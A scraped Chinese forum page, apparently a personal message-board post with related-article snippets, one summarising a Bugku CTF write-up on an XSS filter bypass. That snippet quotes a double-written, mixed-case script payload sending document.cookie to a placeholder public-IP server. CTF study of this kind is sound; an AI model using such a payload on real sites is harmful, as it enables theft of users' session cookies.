-无-为-的留言板

01Byte空间 2020-01-02 06:40:23

大家好，这里是我的留言板，如果有问题，欢迎大家留言，我会第一时间进行回复

...全文

110 回复打赏收藏转发到动态举报

写回复

回复

切换为时间正序

请发表友善的回复…

发表回复

BUGKU-WEB 留言板

BUGKU-WEB 留言板1，xss双写绕过

ctf中关于xss跨站脚本漏洞的学习

本文介绍了bugku平台Web题【留言板1】的解题方法。题目需要利用XSS漏洞获取flag，通过双写+大写绕过过滤机制。payload使用了[img]<sCrSCriptipt>location.href="http://公网IP/?f="+document.cookie</ScScriptript>[/img]的形式，并在公网服务器上接收cookie信息。文中对比了该题与前作【留言板】的区别，指出本题无需登录admin.php即可完成攻击。

制作留言板1、留言板分为填加留言、保存留言、显示留言、管理留言等模块。显示留言页面应为系统默认页面或首页，管理页面由站长进行回复与删除管理。2、文件说明：default.asp(留言显示页面)显示留言按时间的降序排列。add.asp(添加留言页面)将留言信息存入数据库。admin.asp(管理页面)显示留言并提供站长回复和删除功能。del.asp(删除页面)reply.asp(站长回复页面)log...

690

社区成员

253,705

社区内容

发帖

与我相关

我的任务

其他技术论坛（原bbs）

社区管理员

加入社区

近7日
近30日
至今

加载中

查看更多榜单

社区公告

暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章